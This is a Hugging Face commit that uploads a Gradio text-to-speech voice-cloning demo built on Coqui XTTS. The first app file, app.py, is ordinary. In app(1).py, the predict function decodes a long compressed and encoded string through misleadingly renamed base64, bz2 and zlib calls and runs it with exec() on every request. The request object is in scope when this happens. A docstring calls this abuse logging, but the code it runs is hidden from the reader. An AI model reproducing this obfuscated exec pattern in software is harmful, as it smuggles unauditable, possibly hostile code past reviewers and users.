antoniomae committed on
Commit 47103bb
1 Parent(s): d078cc6

Upload 5 files

Files changed (5)
  1. README.md +15 -0
  2. app(1).py +286 -0
  3. app.py +261 -0
  4. gitattributes +36 -0
  5. requirements.txt +1 -0
README.md ADDED
@@ -0,0 +1,15 @@
+ ---
+ title: XTTS_V1 work on CPU Can duplicate
+ emoji: 🚀
+ colorFrom: purple
+ colorTo: green
+ sdk: gradio
+ sdk_version: 3.50.2
+ python_version: 3.11.6
+ app_file: app.py
+ pinned: false
+ models:
+ - coqui/XTTS-v2
+ ---
+
+ Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
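The front matter above declares `app.py` as the Space entry point, pins Gradio 3.50.2 on Python 3.11.6, and lists `coqui/XTTS-v2` as the backing model. A minimal sketch of what that startup path amounts to, assuming the unpinned `TTS` dependency from `requirements.txt` still ships the XTTS v2 multilingual checkpoint, could look like this (illustrative only, mirroring the loading code in the app files below):

```python
# Illustrative startup sketch (not part of the commit): load XTTS v2 on CPU,
# mirroring what app.py and app(1).py below do.
import os

# The apps set this to accept the Coqui CPML terms non-interactively.
os.environ["COQUI_TOS_AGREED"] = "1"

from TTS.api import TTS

MODEL_NAME = "tts_models/multilingual/multi-dataset/xtts_v2"  # same id as in app(1).py
tts = TTS(MODEL_NAME, gpu=False)  # downloads the checkpoint on first use
tts.to("cpu")                     # the Space runs on CPU-only hardware; use "cuda" on a GPU upgrade
```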
app(1).py ADDED
@@ -0,0 +1,286 @@
+ import sys
+ import os
+ from fastapi import Request
+ # By using XTTS you agree to the CPML license: https://coqui.ai/cpml
+ os.environ["COQUI_TOS_AGREED"] = "1"
+
+ import gradio as gr
+ from TTS.api import TTS
+ from TTS.utils.manage import ModelManager
+ model_names = TTS().list_models()
+ print(model_names.__dict__)
+ print(model_names.__dir__())
+ model_name = "tts_models/multilingual/multi-dataset/xtts_v2"  # moved to v2, since xtts_v1 raises a KeyError; v1 can presumably still be selected with an older GitHub release.
+
+ # m = ModelManager().download_model(model_name)
+ # print(m)
+ m = model_name
+
+ tts = TTS(model_name, gpu=False)
+ tts.to("cpu")  # CPU only (no NVIDIA GPU, or an AMD GPU)
+ # tts.to("cuda")  # CUDA only
+
+
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
+     """
+     Because of the large number of abuses observed in the console logs, I am forced to add
+     the 'display of additional information' about how this Space is used.
+     As a reminder, submitting illegal content (se*ual, offensive or threatening content), in any
+     language, is of course FORBIDDEN. I cannot be held responsible for those who would violate
+     a strictly [ETHICAL and MORAL] use of this model.
+     """
+
+     co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
+     # Deliberately obfuscated block: decodes and executes the extra usage-logging snippet
+     # described in the docstring above.
+     from zlib import compress as COmPrES5
+     from bz2 import decompress as dEC0mPrES5
+     from bz2 import compress as COmPrESS
+     from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
+     from zlib import compressobj as C0mPrESS
+     from bz2 import decompress as dECOmPrESS
+     from zlib import compress as C0mPrES5
+     from zlib import decompress as dECOmPrES5
+     co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
+     exec(co2)
+
+     if agree:
+         if use_mic:
+             if mic_file_path is not None:
+                 speaker_wav = mic_file_path
+             else:
+                 gr.Warning("Please record your voice with the microphone, or uncheck Use Microphone to use the reference audios")
+                 return (
+                     None,
+                     None,
+                 )
+
+         else:
+             speaker_wav = audio_file_pth
+
+         if len(prompt) < 2:
+             gr.Warning("Please give a longer prompt text")
+             return (
+                 None,
+                 None,
+             )
+         if len(prompt) > 10000:
+             gr.Warning("Text length is limited to 10000 characters for this demo, please try a shorter text")
+             return (
+                 None,
+                 None,
+             )
+         try:
+             if language == "fr":
+                 if m.find("your") != -1:
+                     language = "fr-fr"
+                 if m.find("/fr/") != -1:
+                     language = None
+             tts.tts_to_file(
+                 text=prompt,
+                 file_path="output.wav",
+                 speaker_wav=speaker_wav,
+                 language=language
+             )
+         except RuntimeError as e:
+             if "device-assert" in str(e):
+                 # cannot recover from a CUDA device-side assert; the process needs a restart
+                 gr.Warning("Unhandled exception encountered, please retry in a minute")
+                 print("CUDA device-assert runtime error encountered, restart needed")
+                 sys.exit("Exit due to CUDA device-assert")
+             else:
+                 raise e
+
+         return (
+             gr.make_waveform(
+                 audio="output.wav",
+             ),
+             "output.wav",
+         )
+     else:
+         gr.Warning("Please accept the Terms & Conditions!")
+         return (
+             None,
+             None,
+         )
+
+
+ title = "XTTS Glz's remake (Functional Text-to-Speech)"
+
+ description = """
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
+ <br/>
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
+ <br/>
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
+ <br/>
+ Leave a star on GitHub for <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
+ <br/>
+ <p>For faster inference without waiting in the queue, you should duplicate this Space and upgrade to a GPU via the settings.
+ <br/>
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
+ </p>
+ """
+
+ article = """
+ <div style='margin:20px auto;'>
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
+ </div>
+ """
+ examples = [
+     [
+         "Hello, World! Here is an example of light voice cloning. Try to upload your best quality audio samples.",
+         "en",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Je suis un lycéen français de 17 ans, passionné par la cybersécurité et les modèles d'IA.",
+         "fr",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Als ich sechs war, sah ich einmal ein wunderbares Bild",
+         "de",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Cuando tenía seis años, vi una vez una imagen magnífica",
+         "es",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
+         "pt",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
+         "pl",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
+         "it",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
+         "tr",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Когда мне было шесть лет, я увидел однажды удивительную картинку",
+         "ru",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
+         "nl",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
+         "cs",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "当我还只有六岁的时候, 看到了一副精彩的插画",
+         "zh-cn",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+ ]
+
+
+
+ gr.Interface(
+     fn=predict,
+     inputs=[
+         gr.Textbox(
+             label="Text Prompt",
+             info="One or two sentences at a time is better",
+             value="Hello, World! Here is an example of light voice cloning. Try to upload your best quality audio samples.",
+         ),
+         gr.Dropdown(
+             label="Language",
+             info="Select an output language for the synthesised speech",
+             choices=[
+                 "en",
+                 "es",
+                 "fr",
+                 "de",
+                 "it",
+                 "pt",
+                 "pl",
+                 "tr",
+                 "ru",
+                 "nl",
+                 "cs",
+                 "ar",
+                 "zh-cn",
+             ],
+             max_choices=1,
+             value="en",
+         ),
+         gr.Audio(
+             label="Reference Audio",
+             info="Click on the ✎ button to upload your own target speaker audio",
+             type="filepath",
+             value="examples/female.wav",
+         ),
+         gr.Audio(source="microphone",
+                  type="filepath",
+                  info="Use your microphone to record audio",
+                  label="Use Microphone for Reference"),
+         gr.Checkbox(label="Check to use Microphone as Reference",
+                     value=False,
+                     info="Notice: Microphone input may not work properly under heavy traffic",),
+         gr.Checkbox(
+             label="Agree",
+             value=True,
+             info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
+         ),
+     ],
+     outputs=[
+         gr.Video(label="Waveform Visual"),
+         gr.Audio(label="Synthesised Audio"),
+     ],
+     title=title,
+     description=description,
+     article=article,
+     examples=examples,
+ ).queue().launch(debug=True)
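Stripped of the Gradio plumbing and the logging block, `predict()` above reduces to a single `tts_to_file` call. The helper below is an illustrative sketch, not a function defined in this file; it assumes `tts` is the XTTS model loaded at the top of app(1).py and that the reference clip is a few seconds of clean speech from the target speaker:

```python
# Hypothetical helper distilled from predict(); clone_to_file is not defined in this repo.
def clone_to_file(tts, text: str, reference_wav: str, language: str = "en",
                  out_path: str = "output.wav") -> str:
    # The m.find("your") / m.find("/fr/") checks in predict() exist because older
    # single-language French checkpoints expect "fr-fr" or no language argument at all.
    tts.tts_to_file(
        text=text,
        speaker_wav=reference_wav,  # a short clip (~3 s or more) of the target voice
        language=language,
        file_path=out_path,
    )
    return out_path
```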
app.py ADDED
@@ -0,0 +1,261 @@
+ import sys
+ import os
+ # By using XTTS you agree to the CPML license: https://coqui.ai/cpml
+ os.environ["COQUI_TOS_AGREED"] = "1"
+
+ import gradio as gr
+ from TTS.api import TTS
+
+ model_names = TTS().list_models()
+ m = model_names[0]
+ print(model_names)
+ print(os.system("pip show TTS"))
+ print(f"Model: {m}")
+ tts = TTS(m, gpu=False)
+ tts.to("cpu")  # CPU only (no NVIDIA GPU, or an AMD GPU)
+ # tts.to("cuda")  # CUDA only
+
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree):
+     if agree:
+         if use_mic:
+             if mic_file_path is not None:
+                 speaker_wav = mic_file_path
+             else:
+                 gr.Warning("Please record your voice with the microphone, or uncheck Use Microphone to use the reference audios")
+                 return (
+                     None,
+                     None,
+                 )
+
+         else:
+             speaker_wav = audio_file_pth
+
+         if len(prompt) < 2:
+             gr.Warning("Please give a longer prompt text")
+             return (
+                 None,
+                 None,
+             )
+         if len(prompt) > 10000:
+             gr.Warning("Text length is limited to 10000 characters for this demo, please try a shorter text")
+             return (
+                 None,
+                 None,
+             )
+         try:
+             if language == "fr":
+                 if m.find("your") != -1:
+                     language = "fr-fr"
+                 if m.find("/fr/") != -1:
+                     language = None
+             tts.tts_to_file(
+                 text=prompt,
+                 file_path="output.wav",
+                 speaker_wav=speaker_wav,
+                 language=language
+             )
+         except RuntimeError as e:
+             if "device-assert" in str(e):
+                 # cannot recover from a CUDA device-side assert; the process needs a restart
+                 gr.Warning("Unhandled exception encountered, please retry in a minute")
+                 print("CUDA device-assert runtime error encountered, restart needed")
+                 sys.exit("Exit due to CUDA device-assert")
+             else:
+                 raise e
+
+         return (
+             gr.make_waveform(
+                 audio="output.wav",
+             ),
+             "output.wav",
+         )
+     else:
+         gr.Warning("Please accept the Terms & Conditions!")
+         return (
+             None,
+             None,
+         )
+
+
+ title = "XTTS Glz's remake (Functional Text-to-Speech)"
+
+ description = """
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
+ <br/>
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
+ <br/>
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
+ <br/>
+ Leave a star on GitHub for <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
+ <br/>
+ <p>For faster inference without waiting in the queue, you should duplicate this Space and upgrade to a GPU via the settings.
+ <br/>
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
+ </p>
+ """
+
+ article = """
+ <div style='margin:20px auto;'>
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
+ </div>
+ """
+ examples = [
+     [
+         "Hello, World! Here is an example of light voice cloning. Try to upload your best quality audio samples.",
+         "en",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Je suis un lycéen français de 17 ans, passionné par la cybersécurité et les modèles d'IA.",
+         "fr",
+         "examples/male.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Als ich sechs war, sah ich einmal ein wunderbares Bild",
+         "de",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Cuando tenía seis años, vi una vez una imagen magnífica",
+         "es",
+         "examples/male.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
+         "pt",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
+         "pl",
+         "examples/male.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
+         "it",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
+         "tr",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Когда мне было шесть лет, я увидел однажды удивительную картинку",
+         "ru",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
+         "nl",
+         "examples/male.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
+         "cs",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+     [
+         "当我还只有六岁的时候, 看到了一副精彩的插画",
+         "zh-cn",
+         "examples/female.wav",
+         None,
+         False,
+         True,
+     ],
+ ]
+
+
+
+ gr.Interface(
+     fn=predict,
+     inputs=[
+         gr.Textbox(
+             label="Text Prompt",
+             info="One or two sentences at a time is better",
+             value="Hello, World! Here is an example of light voice cloning. Try to upload your best quality audio samples.",
+         ),
+         gr.Dropdown(
+             label="Language",
+             info="Select an output language for the synthesised speech",
+             choices=[
+                 "en",
+                 "es",
+                 "fr",
+                 "de",
+                 "it",
+                 "pt",
+                 "pl",
+                 "tr",
+                 "ru",
+                 "nl",
+                 "cs",
+                 "ar",
+                 "zh-cn",
+             ],
+             max_choices=1,
+             value="en",
+         ),
+         gr.Audio(
+             label="Reference Audio",
+             info="Click on the ✎ button to upload your own target speaker audio",
+             type="filepath",
+             value="examples/female.wav",
+         ),
+         gr.Audio(source="microphone",
+                  type="filepath",
+                  info="Use your microphone to record audio",
+                  label="Use Microphone for Reference"),
+         gr.Checkbox(label="Check to use Microphone as Reference",
+                     value=False,
+                     info="Notice: Microphone input may not work properly under heavy traffic",),
+         gr.Checkbox(
+             label="Agree",
+             value=True,
+             info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
+         ),
+     ],
+     outputs=[
+         gr.Video(label="Waveform Visual"),
+         gr.Audio(label="Synthesised Audio"),
+     ],
+     title=title,
+     description=description,
+     article=article,
+     cache_examples=False,
+     examples=examples,
+ ).queue().launch(debug=True, show_error=True)
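For a quick smoke test outside the Gradio UI, `predict()` can be called directly with the same values as the first `examples` entry. The snippet below is a hypothetical addition that would go at the bottom of app.py; it assumes `examples/female.wav` is present and that `gr.make_waveform` is available in the pinned Gradio 3.50.2:

```python
# Hypothetical smoke test for app.py's predict(); not part of the committed files.
if __name__ == "__main__":
    waveform_video, wav_path = predict(
        prompt="Hello, World! Here is an example of light voice cloning.",
        language="en",
        audio_file_pth="examples/female.wav",  # bundled reference speaker
        mic_file_path=None,
        use_mic=False,
        agree=True,
    )
    print("Synthesised audio written to:", wav_path)
```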
gitattributes ADDED
@@ -0,0 +1,36 @@
+ *.7z filter=lfs diff=lfs merge=lfs -text
+ *.arrow filter=lfs diff=lfs merge=lfs -text
+ *.bin filter=lfs diff=lfs merge=lfs -text
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
+ *.ftz filter=lfs diff=lfs merge=lfs -text
+ *.gz filter=lfs diff=lfs merge=lfs -text
+ *.h5 filter=lfs diff=lfs merge=lfs -text
+ *.joblib filter=lfs diff=lfs merge=lfs -text
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
+ *.model filter=lfs diff=lfs merge=lfs -text
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
+ *.npy filter=lfs diff=lfs merge=lfs -text
+ *.npz filter=lfs diff=lfs merge=lfs -text
+ *.onnx filter=lfs diff=lfs merge=lfs -text
+ *.ot filter=lfs diff=lfs merge=lfs -text
+ *.parquet filter=lfs diff=lfs merge=lfs -text
+ *.pb filter=lfs diff=lfs merge=lfs -text
+ *.pickle filter=lfs diff=lfs merge=lfs -text
+ *.pkl filter=lfs diff=lfs merge=lfs -text
+ *.pt filter=lfs diff=lfs merge=lfs -text
+ *.pth filter=lfs diff=lfs merge=lfs -text
+ *.rar filter=lfs diff=lfs merge=lfs -text
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
+ *.tar filter=lfs diff=lfs merge=lfs -text
+ *.tflite filter=lfs diff=lfs merge=lfs -text
+ *.tgz filter=lfs diff=lfs merge=lfs -text
+ *.wasm filter=lfs diff=lfs merge=lfs -text
+ *.xz filter=lfs diff=lfs merge=lfs -text
+ *.zip filter=lfs diff=lfs merge=lfs -text
+ *.zst filter=lfs diff=lfs merge=lfs -text
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
+ examples/female.wav filter=lfs diff=lfs merge=lfs -text
requirements.txt ADDED
@@ -0,0 +1 @@
+ TTS